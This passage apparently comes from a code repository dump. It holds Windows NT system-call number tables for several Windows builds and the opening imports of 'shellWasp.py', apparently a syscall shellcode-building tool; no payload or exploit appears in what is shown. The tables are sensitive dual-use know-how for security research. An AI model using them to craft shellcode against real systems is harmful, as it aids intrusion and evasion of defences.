\"NtFindAtom\": 655380, \"NtFlushBuffersFile\": 75, \"NtFlushBuffersFileEx\": 235, \"NtFlushInstallUILanguage\": 236, \"NtFlushInstructionCache\": 786669, \"NtFlushKey\": 196846, \"NtFlushProcessWriteBuffers\": 239, \"NtFlushVirtualMemory\": 240, \"NtFlushWriteBuffer\": 65777, \"NtFreeUserPhysicalPages\": 242, \"NtFreeVirtualMemory\": 30, \"NtFreezeRegistry\": 243, \"NtFreezeTransactions\": 244, \"NtFsControlFile\": 1769529, \"NtGetCachedSigningLevel\": 245, \"NtGetCompleteWnfStateSubscription\": 246, \"NtGetContextThread\": 247, \"NtGetCurrentProcessorNumber\": 1638648, \"NtGetCurrentProcessorNumberEx\": 249, \"NtGetDevicePowerState\": 459002, \"NtGetMUIRegistryInfo\": 251, \"NtGetNextProcess\": 252, \"NtGetNextThread\": 253, \"NtGetNlsSectionPtr\": 254, \"NtGetNotificationResourceManager\": 255, \"NtGetWriteWatch\": 256, \"NtImpersonateAnonymousToken\": 196865, \"NtImpersonateClientOfPort\": 458783, \"NtImpersonateThread\": 258, \"NtInitializeEnclave\": 259, \"NtInitializeNlsFiles\": 260, \"NtInitializeRegistry\": 261, \"NtInitiatePowerAction\": 1114374, \"NtIsProcessInJob\": 524367, \"NtIsSystemResumeAutomatic\": 65799, \"NtIsUILanguageComitted\": 264, \"NtListenPort\": 265, \"NtLoadDriver\": 266, \"NtLoadEnclaveData\": 267, \"NtLoadKey\": 268, \"NtLoadKey2\": 269, \"NtLoadKey3\": 270, \"NtLoadKeyEx\": 271, \"NtLockFile\": 272, \"NtLockProductActivationKeys\": 327953, \"NtLockRegistryKey\": 196882, \"NtLockVirtualMemory\": 275, \"NtMakePermanentObject\": 196884, \"NtMakeTemporaryObject\": 196885, \"NtManageHotPatch\": 278, \"NtManagePartition\": 279, \"NtMapCMFModule\": 280, \"NtMapUserPhysicalPages\": 655641, \"NtMapUserPhysicalPagesScatter\": 655363, \"NtMapViewOfSection\": 40, \"NtMapViewOfSectionEx\": 282, \"NtModifyBootEntry\": 283, \"NtModifyDriverEntry\": 284, \"NtNotifyChangeDirectoryFile\": 285, \"NtNotifyChangeDirectoryFileEx\": 286, \"NtNotifyChangeKey\": 287, \"NtNotifyChangeMultipleKeys\": 288, \"NtNotifyChangeSession\": 289, \"NtOpenDirectoryObject\": 88, \"NtOpenEnlistment\": 290, \"NtOpenEvent\": 64, \"NtOpenEventPair\": 291, \"NtOpenFile\": 51, \"NtOpenIoCompletion\": 292, \"NtOpenJobObject\": 293, \"NtOpenKey\": 18, \"NtOpenKeyEx\": 294, \"NtOpenKeyTransacted\": 295, \"NtOpenKeyTransactedEx\": 296, \"NtOpenKeyedEvent\": 297, \"NtOpenMutant\": 298, \"NtOpenObjectAuditAlarm\": 299, \"NtOpenPartition\": 300, \"NtOpenPrivateNamespace\": 301, \"NtOpenProcess\": 38, \"NtOpenProcessToken\": 302, \"NtOpenProcessTokenEx\": 48, \"NtOpenRegistryTransaction\": 303, \"NtOpenResourceManager\": 304, \"NtOpenSection\": 55, \"NtOpenSemaphore\": 305, \"NtOpenSession\": 306, \"NtOpenSymbolicLinkObject\": 307, \"NtOpenThread\": 308, \"NtOpenThreadToken\": 36, \"NtOpenThreadTokenEx\": 47, \"NtOpenTimer\": 309, \"NtOpenTransaction\": 310, \"NtOpenTransactionManager\": 311, \"NtPlugPlayControl\": 312, \"NtPowerInformation\": 95, \"NtPrePrepareComplete\": 313, \"NtPrePrepareEnlistment\": 314, \"NtPrepareComplete\": 315, \"NtPrepareEnlistment\": 316, \"NtPrivilegeCheck\": 786749, \"NtPrivilegeObjectAuditAlarm\": 318, \"NtPrivilegedServiceAuditAlarm\": 319, \"NtPropagationComplete\": 320, \"NtPropagationFailed\": 321, \"NtProtectVirtualMemory\": 80, \"NtPssCaptureVaSpaceBulk\": 322, \"NtPulseEvent\": 459075, \"NtQueryAttributesFile\": 61, \"NtQueryAuxiliaryCounterFrequency\": 324, \"NtQueryBootEntryOrder\": 325, \"NtQueryBootOptions\": 326, \"NtQueryDebugFilterState\": 328007, \"NtQueryDefaultLocale\": 327701, \"NtQueryDefaultUILanguage\": 262212, \"NtQueryDirectoryFile\": 53, \"NtQueryDirectoryFileEx\": 328, \"NtQueryDirectoryObject\": 329, \"NtQueryDriverEntryOrder\": 330, \"NtQueryEaFile\": 331, \"NtQueryEvent\": 86, \"NtQueryFullAttributesFile\": 332, \"NtQueryInformationAtom\": 333, \"NtQueryInformationByName\": 334, \"NtQueryInformationEnlistment\": 335, \"NtQueryInformationFile\": 17, \"NtQueryInformationJobObject\": 336, \"NtQueryInformationPort\": 337, \"NtQueryInformationProcess\": 25, \"NtQueryInformationResourceManager\": 338, \"NtQueryInformationThread\": 37, \"NtQueryInformationToken\": 33, \"NtQueryInformationTransaction\": 339, \"NtQueryInformationTransactionManager\": 340, \"NtQueryInformationWorkerFactory\": 341, \"NtQueryInstallUILanguage\": 262486, \"NtQueryIntervalProfile\": 328023, \"NtQueryIoCompletion\": 344, \"NtQueryIoRingCapabilities\": 345, \"NtQueryKey\": 22, \"NtQueryLicenseValue\": 346, \"NtQueryMultipleValueKey\": 347, \"NtQueryMutant\": 348, \"NtQueryObject\": 16, \"NtQueryOpenSubKeys\": 349, \"NtQueryOpenSubKeysEx\": 350, \"NtQueryPerformanceCounter\": 327729, \"NtQueryPortInformationProcess\": 65887, \"NtQueryQuotaInformationFile\": 352, \"NtQuerySection\": 81, \"NtQuerySecurityAttributesToken\": 353, \"NtQuerySecurityObject\": 354, \"NtQuerySecurityPolicy\": 355, \"NtQuerySemaphore\": 356, \"NtQuerySymbolicLinkObject\": 357, \"NtQuerySystemEnvironmentValue\": 358, \"NtQuerySystemEnvironmentValueEx\": 359, \"NtQuerySystemInformation\": 54, \"NtQuerySystemInformationEx\": 360, \"NtQueryTimer\": 56, \"NtQueryTimerResolution\": 655721, \"NtQueryValueKey\": 23, \"NtQueryVirtualMemory\": 35, \"NtQueryVolumeInformationFile\": 73, \"NtQueryWnfStateData\": 362, \"NtQueryWnfStateNameInformation\": 363, \"NtQueueApcThread\": 69, \"NtQueueApcThreadEx\": 364, \"NtQueueApcThreadEx2\": 365, \"NtRaiseException\": 366, \"NtRaiseHardError\": 367, \"NtReadFile\": 1703942, \"NtReadFileScatter\": 1703982, \"NtReadOnlyEnlistment\": 368, \"NtReadRequestData\": 84, \"NtReadVirtualMemory\": 63, \"NtReadVirtualMemoryEx\": 369, \"NtRecoverEnlistment\": 370, \"NtRecoverResourceManager\": 371, \"NtRecoverTransactionManager\": 372, \"NtRegisterProtocolAddressInformation\": 373, \"NtRegisterThreadTerminatePort\": 196982, \"NtReleaseKeyedEvent\": 1311095, \"NtReleaseMutant\": 458784, \"NtReleaseSemaphore\": 786442, \"NtReleaseWorkerFactoryWorker\": 196984, \"NtRemoveIoCompletion\": 1835017, \"NtRemoveIoCompletionEx\": 377, \"NtRemoveProcessDebug\": 524666, \"NtRenameKey\": 379, \"NtRenameTransactionManager\": 380, \"NtReplaceKey\": 381, \"NtReplacePartitionUnit\": 382, \"NtReplyPort\": 12, \"NtReplyWaitReceivePort\": 11, \"NtReplyWaitReceivePortEx\": 43, \"NtReplyWaitReplyPort\": 383, \"NtRequestPort\": 384, \"NtRequestWaitReplyPort\": 34, \"NtResetEvent\": 459137, \"NtResetWriteWatch\": 786818, \"NtRestoreKey\": 387, \"NtResumeProcess\": 196996, \"NtResumeThread\": 458834, \"NtRevertContainerImpersonation\": 389, \"NtRollbackComplete\": 390, \"NtRollbackEnlistment\": 391, \"NtRollbackRegistryTransaction\": 392, \"NtRollbackTransaction\": 393, \"NtRollforwardTransactionManager\": 394, \"NtSaveKey\": 524683, \"NtSaveKeyEx\": 917900, \"NtSaveMergedKeys\": 721293, \"NtSecureConnectPort\": 398, \"NtSerializeBoot\": 399, \"NtSetBootEntryOrder\": 400, \"NtSetBootOptions\": 401, \"NtSetCachedSigningLevel\": 402, \"NtSetCachedSigningLevel2\": 403, \"NtSetContextThread\": 404, \"NtSetDebugFilterState\": 655765, \"NtSetDefaultHardErrorPort\": 197014, \"NtSetDefaultLocale\": 328087, \"NtSetDefaultUILanguage\": 262552, \"NtSetDriverEntryOrder\": 409, \"NtSetEaFile\": 410, \"NtSetEvent\": 458766, \"NtSetEventBoostPriority\": 196653, \"NtSetHighEventPair\": 197019, \"NtSetHighWaitLowEventPair\": 197020, \"NtSetIRTimer\": 459165, \"NtSetInformationDebugObject\": 414, \"NtSetInformationEnlistment\": 415, \"NtSetInformationFile\": 39, \"NtSetInformationIoRing\": 416, \"NtSetInformationJobObject\": 417, \"NtSetInformationKey\": 418, \"NtSetInformationObject\": 92, \"NtSetInformationProcess\": 28, \"NtSetInformationResourceManager\": 419, \"NtSetInformationSymbolicLink\": 420, \"NtSetInformationThread\": 13, \"NtSetInformationToken\": 421, \"NtSetInformationTransaction\": 422, \"NtSetInformationTransactionManager\": 423, \"NtSetInformationVirtualMemory\": 424, \"NtSetInformationWorkerFactory\": 425, \"NtSetIntervalProfile\": 328106, \"NtSetIoCompletion\": 427, \"NtSetIoCompletionEx\": 428, \"NtSetLdtEntries\": 429, \"NtSetLowEventPair\": 197038, \"NtSetLowWaitHighEventPair\": 197039, \"NtSetQuotaInformationFile\": 432, \"NtSetSecurityObject\": 433, \"NtSetSystemEnvironmentValue\": 434, \"NtSetSystemEnvironmentValueEx\": 435, \"NtSetSystemInformation\": 436, \"NtSetSystemPowerState\": 437, \"NtSetSystemTime\": 328118, \"NtSetThreadExecutionState\": 328119, \"NtSetTimer\": 98, \"NtSetTimer2\": 440, \"NtSetTimerEx\": 441, \"NtSetTimerResolution\": 655802, \"NtSetUuidSeed\": 262587, \"NtSetValueKey\": 96, \"NtSetVolumeInformationFile\": 444, \"NtSetWnfProcessNotificationEvent\": 445, \"NtShutdownSystem\": 262590, \"NtShutdownWorkerFactory\": 447, \"NtSignalAndWaitForSingleObject\": 1245632, \"NtSinglePhaseReject\": 449, \"NtStartProfile\": 197058, \"NtStopProfile\": 197059, \"NtSubmitIoRing\": 452, \"NtSubscribeWnfStateChange\": 453, \"NtSuspendProcess\": 197062, \"NtSuspendThread\": 459207, \"NtSystemDebugControl\": 456, \"NtTerminateEnclave\": 457, \"NtTerminateJobObject\": 459210, \"NtTerminateProcess\": 458796, \"NtTerminateThread\": 458835, \"NtTestAlert\": 131531, \"NtThawRegistry\": 460, \"NtThawTransactions\": 461, \"NtTraceControl\": 462, \"NtTraceEvent\": 94, \"NtTranslateFilePath\": 1114575, \"NtUmsThreadYield\": 464, \"NtUnloadDriver\": 465, \"NtUnloadKey\": 466, \"NtUnloadKey2\": 467, \"NtUnloadKeyEx\": 468, \"NtUnlockFile\": 469, \"NtUnlockVirtualMemory\": 470, \"NtUnmapViewOfSection\": 42, \"NtUnmapViewOfSectionEx\": 471, \"NtUnsubscribeWnfStateChange\": 472, \"NtUpdateWnfStateData\": 473, \"NtVdmControl\": 474, \"NtWaitForAlertByThreadId\": 393691, \"NtWaitForDebugEvent\": 476, \"NtWaitForKeyedEvent\": 1376733, \"NtWaitForMultipleObjects\": 1900635, \"NtWaitForMultipleObjects32\": 1966106, \"NtWaitForSingleObject\": 851972, \"NtWaitForWorkViaWorkerFactory\": 478, \"NtWaitHighEventPair\": 197087, \"NtWaitLowEventPair\": 197088, \"NtWorkerFactoryWorkerReady\": 196609, \"NtWriteFile\": 1703944, \"NtWriteFileGather\": 1703963, \"NtWriteRequestData\": 87, \"NtWriteVirtualMemory\": 58, \"NtYieldExecution\": 65606, \"RtlGetNativeSystemInformation\": 493}, \"22h2\": {\"NtWorkerFactoryWorkerReady\": 196609, \"NtMapUserPhysicalPagesScatter\": 655363, \"NtWaitForMultipleObjects32\": 1966106, \"NtReplyWaitReceivePortEx\": 43, \"NtQueryDefaultUILanguage\": 262212, \"NtApphelpCacheControl\": 76, \"NtCreateProcessEx\": 77, \"NtIsProcessInJob\": 524367, \"NtAccessCheckByTypeAndAuditAlarm\": 89, \"NtTraceEvent\": 94, \"NtPowerInformation\": 95, \"NtAccessCheckByType\": 99, \"NtAccessCheckByTypeResultList\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 101, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 102, \"NtAddAtomEx\": 1114217, \"NtAddBootEntry\": 106, \"NtAddDriverEntry\": 107, \"NtAdjustTokenClaimsAndDeviceGroups\": 109, \"NtAlertThreadByThreadId\": 262256, \"NtAllocateReserveObject\": 114, \"NtGetNextProcess\": 254, \"NtGetNextThread\": 255, \"NtQueueApcThreadEx\": 368, \"NtUmsThreadYield\": 469, \"NtAllocateUserPhysicalPages\": 115, \"NtAllocateVirtualMemoryEx\": 118, \"NtAlpcAcceptConnectPort\": 119, \"NtAlpcCancelMessage\": 120, \"NtAlpcCreatePort\": 123, \"NtAlpcCreatePortSection\": 124, \"NtAlpcCreateResourceReserve\": 125, \"NtAlpcCreateSectionView\": 126, \"NtAlpcCreateSecurityContext\": 127, \"NtAlpcDeletePortSection\": 128, \"NtAlpcDeleteResourceReserve\": 129, \"NtAlpcDeleteSectionView\": 130, \"NtAlpcDeleteSecurityContext\": 131, \"NtAlpcDisconnectPort\": 132, \"NtAlpcImpersonateClientOfPort\": 134, \"NtAlpcOpenSenderProcess\": 135, \"NtAlpcOpenSenderThread\": 136, \"NtAlpcQueryInformation\": 137, \"NtAlpcQueryInformationMessage\": 138, \"NtAlpcRevokeSecurityContext\": 139, \"NtAlpcSendWaitReceivePort\": 140, \"NtAlpcSetInformation\": 141, \"NtEnumerateBootEntries\": 229, \"NtEnumerateDriverEntries\": 230, \"NtEnumerateSystemEnvironmentValuesEx\": 231, \"NtQueryBootEntryOrder\": 328, \"NtQueryBootOptions\": 329, \"NtQueryDriverEntryOrder\": 333, \"NtQuerySystemEnvironmentValueEx\": 363, \"NtSetBootEntryOrder\": 404, \"NtSetDriverEntryOrder\": 413, \"NtQuerySystemInformationEx\": 364, \"NtInitializeNlsFiles\": 262, \"NtCreateProfileEx\": 193, \"NtCreateWorkerFactory\": 211, \"NtFlushInstallUILanguage\": 238, \"NtGetMUIRegistryInfo\": 253, \"NtGetNlsSectionPtr\": 256, \"NtIsUILanguageComitted\": 266, \"NtReleaseWorkerFactoryWorker\": 196988, \"NtQueryInformationWorkerFactory\": 345, \"NtSetInformationWorkerFactory\": 430, \"NtWaitForWorkViaWorkerFactory\": 483, \"NtShutdownWorkerFactory\": 452, \"NtSetTimerEx\": 446, \"NtCancelTimer2\": 148, \"NtSetTimer2\": 445, \"NtQueryWnfStateData\": 366, \"NtUpdateWnfStateData\": 478, \"NtDisableLastKnownGood\": 225, \"NtEnableLastKnownGood\": 228, \"NtCancelSynchronousIoFile\": 147, \"NtSetIoCompletion\": 432, \"NtSetIoCompletionEx\": 433, \"NtRemoveIoCompletionEx\": 381, \"NtNotifyChangeSession\": 291, \"NtAssociateWaitCompletionPacket\": 144, \"NtFlushProcessWriteBuffers\": 241, \"NtCommitComplete\": 152, \"NtCommitEnlistment\": 153, \"NtCommitTransaction\": 155, \"NtCreateEnlistment\": 173, \"NtCreateResourceManager\": 195, \"NtCreateTransaction\": 205, \"NtCreateTransactionManager\": 206, \"NtEnumerateTransactionObject\": 232, \"NtFreezeTransactions\": 246, \"NtGetNotificationResourceManager\": 257, \"NtOpenEnlistment\": 293, \"NtOpenResourceManager\": 307, \"NtOpenTransaction\": 313, \"NtOpenTransactionManager\": 314, \"NtPrepareComplete\": 318, \"NtPrepareEnlistment\": 319, \"NtPrePrepareComplete\": 316, \"NtPrePrepareEnlistment\": 317, \"NtPropagationComplete\": 323, \"NtPropagationFailed\": 324, \"NtQueryInformationEnlistment\": 339, \"NtQueryInformationResourceManager\": 342, \"NtQueryInformationTransaction\": 343, \"NtQueryInformationTransactionManager\": 344, \"NtReadOnlyEnlistment\": 372, \"NtRecoverEnlistment\": 374, \"NtRecoverResourceManager\": 375, \"NtRecoverTransactionManager\": 376, \"NtRegisterProtocolAddressInformation\": 377, \"NtRenameTransactionManager\": 384, \"NtRollbackComplete\": 394, \"NtRollbackEnlistment\": 395, \"NtRollbackTransaction\": 397, \"NtRollforwardTransactionManager\": 398, \"NtSetInformationEnlistment\": 420, \"NtSetInformationResourceManager\": 424, \"NtSetInformationTransaction\": 427, \"NtSetInformationTransactionManager\": 428, \"NtSinglePhaseReject\": 454, \"NtThawRegistry\": 465, \"NtThawTransactions\": 466, \"NtDrawText\": 227, \"NtTraceControl\": 467, \"NtSetWnfProcessNotificationEvent\": 450, \"NtSetInformationVirtualMemory\": 429, \"NtOpenPrivateNamespace\": 304, \"NtCreatePrivateNamespace\": 189, \"NtDeletePrivateNamespace\": 220, \"NtReplacePartitionUnit\": 386, \"NtSerializeBoot\": 403, \"NtOpenKeyTransacted\": 298, \"NtOpenKeyTransactedEx\": 299, \"NtFreezeRegistry\": 245, \"NtCreateKeyTransacted\": 180, \"NtQuerySecurityAttributesToken\": 357, \"NtWow64CallFunction64\": 503, \"NtWow64WriteVirtualMemory64\": 502, \"NtAlpcConnectPortEx\": 122, \"NtAlpcImpersonateClientContainerOfPort\": 133, \"NtAreMappedFilesTheSame\": 327822, \"NtAssignProcessToJobObject\": 524431, \"NtCreateJobSet\": 179, \"NtCreateJobObject\": 178, \"NtOpenJobObject\": 296, \"NtQueryInformationJobObject\": 340, \"NtSetInformationJobObject\": 422, \"NtTerminateJobObject\": 459215, \"NtCallEnclave\": 145, \"NtTerminateEnclave\": 462, \"NtInitializeEnclave\": 261, \"NtCreateEnclave\": 172, \"NtLoadEnclaveData\": 269, \"NtCreateSectionEx\": 196, \"NtMapViewOfSectionEx\": 284, \"NtUnmapViewOfSectionEx\": 476, \"NtCreatePartition\": 187, \"NtOpenPartition\": 303, \"NtManagePartition\": 281, \"NtMapUserPhysicalPages\": 655643, \"NtAllocateUserPhysicalPagesEx\": 116, \"NtGetWriteWatch\": 258, \"NtResetWriteWatch\": 786822, \"NtCreatePagingFile\": 186, \"NtCancelIoFileEx\": 146, \"NtCancelWaitCompletionPacket\": 149, \"NtCreateWaitCompletionPacket\": 208, \"NtCompareObjects\": 157, \"NtCompareTokens\": 159, \"NtContinueEx\": 163, \"NtCreateCrossVmEvent\": 167, \"NtCreateCrossVmMutant\": 168, \"NtCreateDirectoryObjectEx\": 171, \"NtCreateIRTimer\": 175, \"NtCreateLowBoxToken\": 182, \"NtCreateRegistryTransaction\": 194, \"NtCreateThreadEx\": 199, \"NtCreateTimer2\": 202, \"NtCreateTokenEx\": 204, \"NtCreateUserProcess\": 207, \"NtCreateWaitablePort\": 209, \"NtCreateWnfStateName\": 210, \"NtDebugContinue\": 213, \"NtDeleteBootEntry\": 215, \"NtDeleteDriverEntry\": 216, \"NtDeleteWnfStateData\": 222, \"NtDeleteWnfStateName\": 223, \"NtDirectGraphicsCall\": 224, \"NtFilterBootOption\": 234, \"NtFilterToken\": 235, \"NtFilterTokenEx\": 236, \"NtGetCachedSigningLevel\": 247, \"NtGetCompleteWnfStateSubscription\": 248, \"NtGetContextThread\": 249, \"NtGetCurrentProcessorNumber\": 1638650, \"NtGetCurrentProcessorNumberEx\": 251, \"NtGetDevicePowerState\": 459004, \"NtImpersonateAnonymousToken\": 196867, \"NtInitializeRegistry\": 263, \"NtInitiatePowerAction\": 1114376, \"NtIsSystemResumeAutomatic\": 65801, \"NtLoadKeyEx\": 273, \"NtLockProductActivationKeys\": 327955, \"NtLockRegistryKey\": 196884, \"NtMakePermanentObject\": 196886, \"NtManageHotPatch\": 280, \"NtMapCMFModule\": 282, \"NtModifyBootEntry\": 285, \"NtModifyDriverEntry\": 286, \"NtNotifyChangeDirectoryFileEx\": 288, \"NtNotifyChangeMultipleKeys\": 290, \"NtOpenKeyEx\": 297, \"NtOpenKeyedEvent\": 300, \"NtOpenRegistryTransaction\": 306, \"NtPlugPlayControl\": 315, \"NtPssCaptureVaSpaceBulk\": 325, \"NtQueryAuxiliaryCounterFrequency\": 327, \"NtQueryDebugFilterState\": 328010, \"NtQueryInformationByName\": 337, \"NtQueryInstallUILanguage\": 262490, \"NtQueryLicenseValue\": 350, \"NtQueryOpenSubKeys\": 353, \"NtQueryOpenSubKeysEx\": 354, \"NtQueryPortInformationProcess\": 65891, \"NtQuerySecurityPolicy\": 359, \"NtQueryWnfStateNameInformation\": 367, \"NtRenameKey\": 383, \"NtResumeProcess\": 197000, \"NtRevertContainerImpersonation\": 393, \"NtRollbackRegistryTransaction\": 396, \"NtSaveKeyEx\": 917904, \"NtSaveMergedKeys\": 721297, \"NtSecureConnectPort\": 402, \"NtSetBootOptions\": 405, \"NtSetCachedSigningLevel\": 406, \"NtSetCachedSigningLevel2\": 407, \"NtSetContextThread\": 408, \"NtSetDebugFilterState\": 655769, \"NtSetDefaultUILanguage\": 262556, \"NtSetIRTimer\": 459169, \"NtSetInformationDebugObject\": 419, \"NtSetInformationSymbolicLink\": 425, \"NtSetLdtEntries\": 434, \"NtSetSystemEnvironmentValueEx\": 440, \"NtSetSystemPowerState\": 442, \"NtSetThreadExecutionState\": 328124, \"NtSetUuidSeed\": 262592, \"NtSubscribeWnfStateChange\": 458, \"NtSuspendProcess\": 197067, \"NtTranslateFilePath\": 1114580, \"NtUnloadKey2\": 472, \"NtUnloadKeyEx\": 473, \"NtUnsubscribeWnfStateChange\": 477, \"NtVdmControl\": 479, \"NtWaitForAlertByThreadId\": 393696, \"NtWaitForDebugEvent\": 481, \"NtLoadKey3\": 272, \"NtAlpcConnectPort\": 121, \"NtFreeUserPhysicalPages\": 244, \"KiUserApcDispatcher\": 0, \"NtAlertThread\": 196719, \"NtCallbackReturn\": 5, \"NtQueueApcThread\": 69, \"NtTestAlert\": 131536, \"NtAddAtom\": 655431, \"NtDeleteAtom\": 262358, \"NtFindAtom\": 655380, \"NtQueryInformationAtom\": 336, \"NtSystemDebugControl\": 461, \"NtDisplayString\": 226, \"NtRaiseException\": 370, \"NtRaiseHardError\": 371, \"NtSetDefaultHardErrorPort\": 197018, \"NtQuerySystemEnvironmentValue\": 362, \"NtSetSystemEnvironmentValue\": 439, \"NtLoadDriver\": 268, \"NtUnloadDriver\": 470, \"NtFlushWriteBuffer\": 65779, \"NtShutdownSystem\": 262595, \"NtQueryDefaultLocale\": 327701, \"NtSetDefaultLocale\": 328091, \"NtAllocateVirtualMemory\": 24, \"NtFlushVirtualMemory\": 242, \"NtFreeVirtualMemory\": 30, \"NtLockVirtualMemory\": 277, \"NtProtectVirtualMemory\": 80, \"NtQueryVirtualMemory\": 35, \"NtReadVirtualMemory\": 63, \"NtUnlockVirtualMemory\": 475, \"NtWriteVirtualMemory\": 58, \"NtQuerySecurityObject\": 358, \"NtSetSecurityObject\": 438, \"NtDuplicateObject\": 60, \"NtMakeTemporaryObject\": 196887, \"NtQueryObject\": 16, \"NtSetInformationObject\": 92, \"NtSignalAndWaitForSingleObject\": 1245637, \"NtWaitForMultipleObjects\": 1900635, \"NtWaitForSingleObject\": 851972, \"NtCreateDebugObject\": 169, \"NtDebugActiveProcess\": 524500, \"NtRemoveProcessDebug\": 524670, \"NtCreateDirectoryObject\": 170, \"NtOpenDirectoryObject\": 88, \"NtQueryDirectoryObject\": 332, \"NtClearEvent\": 196670, \"NtCreateEvent\": 72, \"NtOpenEvent\": 64, \"NtPulseEvent\": 459078, \"NtQueryEvent\": 86, \"NtResetEvent\": 459141, \"NtSetEvent\": 458766, \"NtSetEventBoostPriority\": 196653, \"NtCreateEventPair\": 174, \"NtOpenEventPair\": 294, \"NtSetHighEventPair\": 197023, \"NtSetHighWaitLowEventPair\": 197024, \"NtSetLowEventPair\": 197043, \"NtSetLowWaitHighEventPair\": 197044, \"NtWaitHighEventPair\": 197092, \"NtWaitLowEventPair\": 197093, \"NtCancelIoFile\": 93, \"NtCreateFile\": 85, \"NtCreateMailslotFile\": 183, \"NtCreateNamedPipeFile\": 185, \"NtDeleteFile\": 217, \"NtDeviceIoControlFile\": 1769479, \"NtFlushBuffersFile\": 75, \"NtFsControlFile\": 1769529, \"NtLockFile\": 274, \"NtNotifyChangeDirectoryFile\": 287, \"NtOpenFile\": 51, \"NtQueryAttributesFile\": 61, \"NtQueryDirectoryFile\": 53, \"NtQueryEaFile\": 334, \"NtQueryFullAttributesFile\": 335, \"NtQueryInformationFile\": 17, \"NtQueryVolumeInformationFile\": 73, \"NtReadFile\": 1703942, \"NtReadFileScatter\": 1703982, \"NtSetEaFile\": 414, \"NtSetInformationFile\": 39, \"NtSetVolumeInformationFile\": 449, \"NtUnlockFile\": 474, \"NtWriteFile\": 1703944, \"NtWriteFileGather\": 1703963, \"NtCreateIoCompletion\": 176, \"NtOpenIoCompletion\": 295, \"NtQueryIoCompletion\": 348, \"NtRemoveIoCompletion\": 1835017, \"NtCompactKeys\": 156, \"NtCompressKey\": 196769, \"NtCreateKey\": 29, \"NtDeleteKey\": 218, \"NtDeleteValueKey\": 221, \"NtEnumerateKey\": 50, \"NtEnumerateValueKey\": 19, \"NtFlushKey\": 196848, \"NtLoadKey\": 270, \"NtLoadKey2\": 271, \"NtNotifyChangeKey\": 289, \"NtOpenKey\": 18, \"NtQueryKey\": 22, \"NtQueryMultipleValueKey\": 351, \"NtQueryValueKey\": 23, \"NtReplaceKey\": 385, \"NtRestoreKey\": 391, \"NtSaveKey\": 524687, \"NtSetInformationKey\": 423, \"NtSetValueKey\": 96, \"NtUnloadKey\": 471, \"NtCreateKeyedEvent\": 181, \"NtReleaseKeyedEvent\": 1311099, \"NtWaitForKeyedEvent\": 1376738, \"NtCreateMutant\": 184, \"NtOpenMutant\": 301, \"NtQueryMutant\": 352, \"NtReleaseMutant\": 458784, \"NtAcceptConnectPort\": 2, \"NtCompleteConnectPort\": 160, \"NtConnectPort\": 162, \"NtCreatePort\": 188, \"NtImpersonateClientOfPort\": 458783, \"NtListenPort\": 267, \"NtQueryInformationPort\": 341, \"NtReadRequestData\": 84, \"NtReplyPort\": 12, \"NtReplyWaitReceivePort\": 11, \"NtReplyWaitReplyPort\": 387, \"NtRequestPort\": 388, \"NtRequestWaitReplyPort\": 34, \"NtWriteRequestData\": 87, \"NtCreateProcess\": 190, \"NtFlushInstructionCache\": 786671, \"NtOpenProcess\": 38, \"NtQueryInformationProcess\": 25, \"NtSetInformationProcess\": 28, \"NtTerminateProcess\": 458796, \"NtCreateProfile\": 192, \"NtQueryIntervalProfile\": 328027, \"NtSetIntervalProfile\": 328111, \"NtStartProfile\": 197063, \"NtStopProfile\": 197064, \"NtCreateSection\": 74, \"NtExtendSection\": 233, \"NtMapViewOfSection\": 40, \"NtOpenSection\": 55, \"NtQuerySection\": 81, \"NtUnmapViewOfSection\": 42, \"NtCreateSemaphore\": 197, \"NtOpenSemaphore\": 308, \"NtQuerySemaphore\": 360, \"NtReleaseSemaphore\": 786442, \"NtCreateSymbolicLinkObject\": 198, \"NtOpenSymbolicLinkObject\": 310, \"NtQuerySymbolicLinkObject\": 361, \"NtAlertResumeThread\": 458862, \"NtContinue\": 67, \"NtCreateThread\": 78, \"NtDelayExecution\": 393268, \"NtImpersonateThread\": 260, \"NtOpenThread\": 311, \"NtQueryInformationThread\": 37, \"NtRegisterThreadTerminatePort\": 196986, \"NtResumeThread\": 458834, \"NtSetInformationThread\": 13, \"NtSuspendThread\": 459212, \"NtTerminateThread\": 458835, \"NtYieldExecution\": 65606, \"NtCancelTimer\": 458849, \"NtCreateTimer\": 201, \"NtOpenTimer\": 312, \"NtQueryTimer\": 56, \"NtSetTimer\": 98, \"NtAdjustGroupsToken\": 108, \"NtAdjustPrivilegesToken\": 65, \"NtCreateToken\": 203, \"NtDuplicateToken\": 66, \"NtOpenProcessToken\": 305, \"NtOpenThreadToken\": 36, \"NtQueryInformationToken\": 33, \"NtSetInformationToken\": 426, \"NtAccessCheckAndAuditAlarm\": 41, \"NtCloseObjectAuditAlarm\": 59, \"NtDeleteObjectAuditAlarm\": 219, \"NtOpenObjectAuditAlarm\": 302, \"NtPrivilegeObjectAuditAlarm\": 321, \"NtPrivilegedServiceAuditAlarm\": 322, \"NtAccessCheck\": 0, \"NtAllocateLocallyUniqueId\": 262257, \"NtAllocateUuids\": 1114229, \"NtPrivilegeCheck\": 786752, \"NtQuerySystemInformation\": 54, \"NtSetSystemInformation\": 441, \"NtQueryPerformanceCounter\": 327729, \"NtQuerySystemTime\": 1572954, \"NtQueryTimerResolution\": 655725, \"NtSetSystemTime\": 328123, \"NtSetTimerResolution\": 655807, \"NtClose\": 196623, \"NtFlushBuffersFileEx\": 237, \"NtOpenProcessTokenEx\": 48, \"NtOpenThreadTokenEx\": 47, \"NtQueryDirectoryFileEx\": 331, \"NtQueryQuotaInformationFile\": 356, \"NtSetQuotaInformationFile\": 437}}}\r\n" }, { "path": "start/shellWasp.py", "content": "import os\r\nimport json\r\nfrom .syscall_signatures import *\r\nfrom .ui import *\r\nfrom keystone import *\r\nfrom binascii import hexlify\r\nfrom .parseconf import *\r\nimport colorama\r\nimport copy\r\nimport sys\r\nimport ast\r\nimport traceback\r\nimport re\r\nimport datetime\r\nfrom .syscallPossibleValues import syscallPossibleValues\r\nfrom .syscallAIHelper import *\r\nfrom .syscallAiPrompts import *\r\n\r\ncolorama.init()\r\n\r\n\r\nred ='\\u001b[31;1m'\r\ngre = '\\u001b[32;1m'\r\nyel = '\\u001b[33;1m'\r\nblu = '\\u001b[34;1m'\r\nmag = '\\u001b[35;1m'\r\ncya = '\\u001b[36;1m'\r\nwhi = '\\u001b[37m'\r\nres = '\\u001b[0m'\r\nres2 = '\\u001b[0m'\r\n\r\noldsysOut=sys.stdout\r\nmy_stdout = open( 1, \"w\", buffering = 400000 )\r\n\r\nsys.stdout = 